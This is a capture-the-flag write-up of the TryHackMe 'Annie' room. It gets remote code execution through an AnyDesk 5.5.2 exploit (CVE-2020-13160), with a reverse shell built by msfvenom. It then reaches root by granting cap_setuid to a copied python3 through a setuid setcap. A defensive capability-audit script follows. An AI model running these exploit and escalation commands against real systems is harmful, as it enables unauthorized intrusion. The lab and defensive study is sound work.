Annie
Remote access comes in different flavors. This is another TryHackMe free room, classified as medium difficulty.
The first thing I try is to see if there is a web response. Nothing answers on port 80. Okay, I would run nmap anyway.
w1zard in try-hack-me/rooms/annie
nmap -Pn -p- -oA nmap-fullports-annie 10.10.92.77
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-11 17:35 -03
Nmap scan report for 10.10.92.77
Host is up (0.35s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
7070/tcp open realserver
43353/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 1082.16 seconds
Right, we can run the default script scan along with the service/version detection.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 72d72534e807b7d96fbad6981aa317db (RSA)
| 256 721026ce5c53084b6183f87ad19e9b86 (ECDSA)
|_ 256 d10e6da84e8e20ce1f0032c1448dfe4e (ED25519)
7070/tcp open ssl/realserver?
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=AnyDesk Client
| Not valid before: 2022-03-23T20:04:30
|_Not valid after: 2072-03-10T20:04:30
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
I kinda wanted a version number, but let’s work with what we have in hand. Let me look for some exploits.
w1zard in try-hack-me/rooms/annie
searchsploit anydesk
----------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------- ---------------------------------
AnyDesk 2.5.0 - Unquoted Service Path Privilege Escalation | windows/local/40410.txt
AnyDesk 5.4.0 - Unquoted Service Path | windows/local/47883.txt
AnyDesk 5.5.2 - Remote Code Execution | linux/remote/49613.py
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Going straight for the RCE.
w1zard in try-hack-me/rooms/annie
searchsploit -m 49613
Exploit: AnyDesk 5.5.2 - Remote Code Execution
URL: https://www.exploit-db.com/exploits/49613
Path: /usr/share/exploitdb/exploits/linux/remote/49613.py
Codes: CVE-2020-13160
Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/w1zard/Documents/labs/try-hack-me/rooms/annie/49613.py
A bit of inspection and, oh, great, there's a link to a walkthrough. I just have to change the target IP and port and create a shellcode payload using msfvenom.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.y.y LPORT=4444 -b "\x00\x25\x26" -f python -v shellcode
The shellcode goes into the exploit, and the exploit does nothing. I tried running it a couple of times, thought the machine was wonky and rebooted it. Executed the exploit a couple more times, nothing. Fvck. Changed absolutely nothing, ran the exploit a few more times…
connect to [10.13.3.36] from (UNKNOWN) [10.10.128.217] 45640
No logic, just repeat the same thing and maybe you’ll get a different result.
python3 -c 'import pty;pty.spawn("/bin/bash")'
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
annie@desktop:/home/annie$ cat user.txt
THM{N0t_Ju5t_ANY_D3sk}
Now for the privilege escalation, the way I found was through setuid files owned by root.
find / -perm -4000 -type f -exec ls -al {} 2>/dev/null \;
annie@desktop:/home/annie$ find / -perm -4000 -type f -exec ls -al {} 2>/dev/null \;
-rwsr-xr-x 1 root root 10232 Nov 16 2017 /sbin/setcap
-rwsr-xr-x 1 root root 43088 Sep 16 2020 /bin/mount
-rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping
-rwsr-xr-x 1 root root 44664 Jan 25 2022 /bin/su
-rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
-rwsr-xr-x 1 root root 26696 Sep 16 2020 /bin/umount
-rwsr-xr-- 1 root dip 378600 Jul 23 2020 /usr/sbin/pppd
-rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 436552 Mar 2 2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 14328 Jan 12 2022 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-sr-x 1 root root 10232 Dec 14 2021 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-- 1 root messagebus 42992 Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 22528 Jun 28 2019 /usr/bin/arping
-rwsr-xr-x 1 root root 40344 Jan 25 2022 /usr/bin/newgrp
-rwsr-xr-x 1 root root 149080 Jan 19 2021 /usr/bin/sudo
-rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 76496 Jan 25 2022 /usr/bin/chfn
-rwsr-xr-x 1 root root 75824 Jan 25 2022 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 44528 Jan 25 2022 /usr/bin/chsh
-rwsr-xr-x 1 root root 59640 Jan 25 2022 /usr/bin/passwd
-rwsr-xr-x 1 root root 22520 Jan 12 2022 /usr/bin/pkexec
setcap stands out from the list. Let me have a look at this. Okay, you can force capabilities upon programs using setcap, and they can be exploited by passing them malicious commands or arguments which are then run as root. Thanks HackTricks. The point is that setcap is normally not setuid: with the s bit set, an unprivileged user can grant a capability such as cap_setuid to any binary they can write to.
annie@desktop:/home/annie$ which python3
/usr/bin/python3
annie@desktop:/home/annie$ cp /usr/bin/python3 .
annie@desktop:/home/annie$ /sbin/setcap cap_setuid+ep /home/annie/python3
annie@desktop:/home/annie$ ./python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
root@desktop:/home/annie# cat /root/root.txt
THM{0nly_th3m_5.5.2_D3sk}
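As an added defender's check (not part of the original walkthrough or the room), this Python audit decodes the security.capability xattr directly, flags any file that carries cap_setuid as permitted and effective or has file capabilities outside system directories (like the copied /home/annie/python3 above), and reports a setuid /sbin/setcap, which is the root cause of this escalation. The SYSTEM_DIRS allowlist and the setcap path are assumptions; os.getxattr is Linux-only.

```python
import os
import stat
import struct

# Constants from <linux/capability.h>; cap_setuid is capability number 7
CAP_SETUID = 7
VFS_CAP_REVISION_MASK = 0xFF000000
VFS_CAP_REVISIONS = (0x02000000, 0x03000000)  # vfs_cap_data revisions 2 and 3
VFS_CAP_FLAGS_EFFECTIVE = 0x000001
# Assumed allowlist: where file caps are legitimately expected (e.g. ping with cap_net_raw)
SYSTEM_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/")
SETCAP = "/sbin/setcap"  # path from the walkthrough; must never be setuid

def parse_security_capability(raw):
    """Decode a security.capability xattr (struct vfs_cap_data, little-endian)."""
    magic_etc = struct.unpack_from("<I", raw, 0)[0]
    if (magic_etc & VFS_CAP_REVISION_MASK) not in VFS_CAP_REVISIONS:
        raise ValueError("unsupported vfs_cap_data revision 0x%08x" % magic_etc)
    # data[0] holds caps 0-31, data[1] caps 32-63; revision 3 appends a rootid we ignore
    p0, i0, p1, i1 = struct.unpack_from("<IIII", raw, 4)
    effective = bool(magic_etc & VFS_CAP_FLAGS_EFFECTIVE)
    return p0 | (p1 << 32), i0 | (i1 << 32), effective

def assess(path, caps):
    """Findings for one file that carries capabilities (permitted, inheritable, effective)."""
    permitted, _inheritable, effective = caps
    findings = []
    if permitted & (1 << CAP_SETUID) and effective:
        findings.append("cap_setuid permitted+effective: holder can setuid(0)")
    if not path.startswith(SYSTEM_DIRS):
        findings.append("file capability outside system directories")
    return findings

def scan(root="/"):
    """Map path -> findings for every file with capabilities; also flag a setuid setcap."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                raw = os.getxattr(path, "security.capability", follow_symlinks=False)
            except OSError:  # ENODATA (no caps), ENOTSUP, EACCES: nothing to report
                continue
            report[path] = assess(path, parse_security_capability(raw))
    if os.path.exists(SETCAP) and os.stat(SETCAP).st_mode & stat.S_ISUID:
        report.setdefault(SETCAP, []).append("setcap is setuid root: any user can grant caps")
    return report

if __name__ == "__main__":
    for path, findings in sorted(scan().items()):
        print(path, "->", "; ".join(findings) or "capabilities present, no finding")
```

Run it as root on the box to cover every directory; a non-root run still catches world-readable copies in home directories like the one above.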